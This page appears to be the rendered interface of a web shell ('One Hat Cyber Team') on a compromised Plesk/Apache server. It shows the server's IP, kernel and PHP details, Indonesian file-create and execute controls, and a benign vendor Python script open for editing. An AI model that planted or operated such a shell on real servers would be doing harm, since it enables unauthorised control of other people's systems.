⚝
One Hat Cyber Team
⚝
Your IP:
216.73.217.4
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
psa
/
admin
/
sbin
/
modules
/
ntp-timesync
/
Edit File: dbus-send.py
#!/usr/bin/env python3 # Copyright 1999-2024. WebPros International GmbH. All rights reserved. import dbus import sys def main(args): if len(args) != 1: raise Exception("Expected exactly one parameter, got " + str(len(args))) property = str(args[0]) bus = dbus.SystemBus() obj = bus.get_object("org.freedesktop.timedate1", "/org/freedesktop/timedate1") proxy = dbus.Interface(obj, dbus_interface="org.freedesktop.DBus.Properties") val = proxy.Get("org.freedesktop.timedate1", property) print("true" if val else "false") if __name__ == "__main__": main(sys.argv[1:])
Simpan